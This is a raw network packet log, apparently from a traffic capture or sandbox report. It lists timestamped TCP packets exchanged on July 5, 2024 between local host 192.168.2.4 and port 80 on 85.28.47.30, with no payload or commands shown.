                                                                Jul 5, 2024 04:36:05.689874887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689876080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689887047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689894915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689908028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689918995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689924002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689951897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689961910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690045118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690057993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690069914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690083027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690095901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690095901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690108061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690120935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690125942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690138102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690140009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690150976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690164089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690170050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690179110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690201044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690215111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690345049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690392971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690500975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690511942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690522909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690535069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690546989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690551043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690560102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690577984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690586090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690589905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690612078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690612078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690618038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.690632105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.690674067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.724782944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.729517937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904907942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904922009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904932976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904943943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904953957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904972076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904972076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.904985905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.904999018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905010939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905013084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905020952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905033112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905044079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905045033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905076981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905076981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905173063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905184031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905194044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905213118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905241966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905256033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905266047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905275106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905287027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905297995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905311108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905340910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905344963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905356884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905365944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905378103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905390024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905416965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905523062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905534029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905543089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905554056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905565023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905565023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905576944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905580044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905589104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905606031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905615091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905623913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905637026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905663013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905663013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905673981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905683994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905695915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905704021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905708075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905719995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905735970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905750036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905750990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905761957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905771971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905782938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905791044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905792952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905806065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905806065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905833960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905843019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905886889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905905008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905916929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905925989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905927896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905936003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.905946016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905957937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.905970097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906050920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906063080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906074047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906085014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906094074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906096935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906120062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906140089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906191111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906203032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906212091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906222105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906230927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906232119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906243086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906245947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906255007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906266928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906275034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906277895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906291008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906296015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906301975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906302929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906315088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906330109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906356096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906488895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906500101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906510115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906522036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906527996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906533003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906546116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906554937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906557083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906569004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906578064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906599998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906621933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906645060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906656027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906666040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906675100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906685114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906687021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906696081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906706095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906708956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906723022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906723022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906742096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906764984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906774044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906785011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906811953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906832933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.906980038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.906991959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907001019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907011986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907026052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907027960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907037973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907048941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907052994 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907059908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907063961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907071114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907083035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907093048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907099962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907104015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907108068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907116890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907130003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907134056 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907143116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907145023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907171965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907191992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907215118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907227039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907234907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907246113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907258034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907259941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907269955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907284021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907296896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907320023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907354116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907366991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907378912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907397032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907401085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907407999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907419920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907427073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907437086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.907454014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.907476902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.996705055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996717930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996730089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996795893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.996853113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996864080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996875048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996887922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.996927023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.996947050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997185946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997199059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997210026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997225046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997235060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997263908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997489929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997508049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997523069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997534990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997545958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997579098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997674942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997688055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997698069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997709990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997721910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997725010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997735023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997747898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997760057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997787952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997798920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997817039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997827053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997837067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997848034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997848988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997860909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997875929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997879028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997889996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997906923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997922897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.997935057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997946978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997957945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997971058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.997976065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998002052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998029947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998119116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998130083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998142004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998161077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998162985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998173952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998187065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998189926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998199940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998212099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998218060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998244047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998250961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998260021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998270988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998295069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998306036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998450994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998462915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998473883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998487949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998493910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998498917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998519897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998549938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998585939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998605013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998616934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998624086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998629093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998644114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998651981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998682022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998696089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998733997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998747110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998758078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998770952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998774052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998784065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998790979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998815060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998842001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.998867035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.998908997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999036074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999048948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999059916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999073029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999079943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999084949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999097109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999097109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999114990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999125004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999125957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999139071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999145031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999151945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999170065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999176979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999190092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999198914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999200106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999214888 CEST4973080192.168.2.485.28.47.30
